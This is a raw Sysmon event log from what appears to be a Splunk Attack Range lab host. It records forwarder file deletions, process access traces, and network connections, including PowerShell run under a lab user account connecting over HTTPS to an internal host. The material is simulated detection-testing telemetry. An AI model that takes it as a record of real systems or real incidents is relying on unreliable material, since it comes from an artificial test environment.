354300x800000000000000035127237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:59.400{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62000-false10.0.1.12-8000- 23542300x800000000000000035127236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:34.103{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=302EBA7D0ED6708196719C7F70E92228,SHA256=D7A167D1F187DA0E1B37352F7D25A6B69912F24D23CBB02670A6D717AB1B62AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:35.135{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5AA5218A6A0EA5BC929B7CAB76E860,SHA256=E2C8864D90B07D321EF6F36C7E4E30A8055A7427E200C30C342180ECDCF9D6B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:36.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=839E434987F4525936E1C2F2C46DDE18,SHA256=A8D14E43CAE73D5A90C1EFD853C3B209F52A81FAB36433A05D9209B854C1B95D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:01.712{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local54633-false10.0.1.14WIN-DC-128389- 23542300x800000000000000035127239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:36.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F4F9F5023E86C4A4D34F54571654AA,SHA256=A524084E55C207C801BAC6D692C5F4FF9C97A249FFB0A5B3FF43B0C49AC57739,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:37.963{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8AADD03E6B5230A46E3E6856C3AEB702,SHA256=439B82ABD86CA14369FE147C029E4E6EEFFEE1A29E5FA910AAF5E4232DBDC161,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:01.875{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62002-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:01.827{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62001-false10.0.1.14WIN-DC-12888kerberos 23542300x800000000000000035127242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:37.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7226D6A7B1EE543D772A545F9415CC46,SHA256=A02242D05FDB5AC071283DB469ED9FAFDCB20864C0CB6479E35A413DE1D3D3CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:38.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3C2776531491A7ABCCB976E1296DB2,SHA256=97B1AACCCBA63E89A0D5315A7AD018811D22540B5B0518691F3383EEB78A7D20,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:39.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DC1146C9E49A158B6F828C2441252FA,SHA256=55959A93EF8BA9FF1DE1C66DBCBD6393D4331829846B250BFCF11056B6A54F5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:05.893{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62004-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:05.240{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62003-false10.0.1.12-8000- 10341000x800000000000000035127258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.870{B81B27B7-8228-613A-A596-03000000C801}69006720C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.739{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7B3EA39942793CD98A6F742DDBDBC07F,SHA256=6B2DA10D02D7E2F9DAFCEFE94A6C425ACF4D2F3F25F54D5706B63AE40B7D6DA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8228-613A-A596-03000000C801}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8228-613A-A596-03000000C801}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.708{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8228-613A-A596-03000000C801}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.702{B81B27B7-8228-613A-A596-03000000C801}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:40.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F87390C054651FFFE17F0942F1E2B4F,SHA256=CC4933AABFCDBB522F0321667F22801CD650A52361F0070DD2F7DD890AE1ED9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D886F67C6490E109B1062C8B830B8649,SHA256=0E50FD3E2F4DD12F7EAD778B6FA02F51D357B90CEDC05A443E6B3D4D55353ACD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7ECEC61657EF4B97CCFDB91B6FF61F16,SHA256=D3805AC0B33E11D30B86B9EA93818C10B975AB7075A920151FE5B4BE37CD9256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.540{B81B27B7-8229-613A-A696-03000000C801}62845940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8229-613A-A696-03000000C801}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8229-613A-A696-03000000C801}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.386{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8229-613A-A696-03000000C801}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.371{B81B27B7-8229-613A-A696-03000000C801}6284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:41.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A925FBD6E8C30A8B1AA1547842B96D1,SHA256=559D0B4DAAFAFB7136CD9358B832D7FE0BF8872C5EF2F3CE0CF9A4521DC1EE01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.239{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=803E24ABDEFDAA43DA321F72F6096E2A,SHA256=A80B489D6C0C2F55CF73936568C44EA1EF0F57FE09D4DA1782661A56B12486C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:42.070{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-822A-613A-A796-03000000C801}2876C:\Program 